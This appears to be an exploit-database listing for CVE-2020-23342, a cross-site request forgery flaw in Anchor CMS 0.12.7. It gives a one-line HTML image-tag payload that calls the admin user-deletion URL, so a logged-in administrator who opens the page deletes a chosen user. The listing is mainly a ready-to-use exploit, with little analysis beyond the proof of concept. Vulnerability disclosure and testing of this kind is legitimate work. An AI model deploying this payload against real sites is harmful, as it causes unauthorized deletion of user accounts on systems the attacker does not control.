Exploit for Anchor CMS 0.12.7 - CSRF (Delete user) 2020-23342 CVE-2020-23342

Name: Exploit for Anchor CMS 0.12.7 - CSRF (Delete user) 2020-23342 CVE-2020-23342
Rating: 5 (90 reviews)

2021-01-21 | CVSS 6.8

## https://sploitus.com/exploit?id=EDB-ID:49451
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342


###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html

================================ 
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================ 
Where (21) is the user id .

When admin clicks on exploit.html link

User with id 21 will be deleted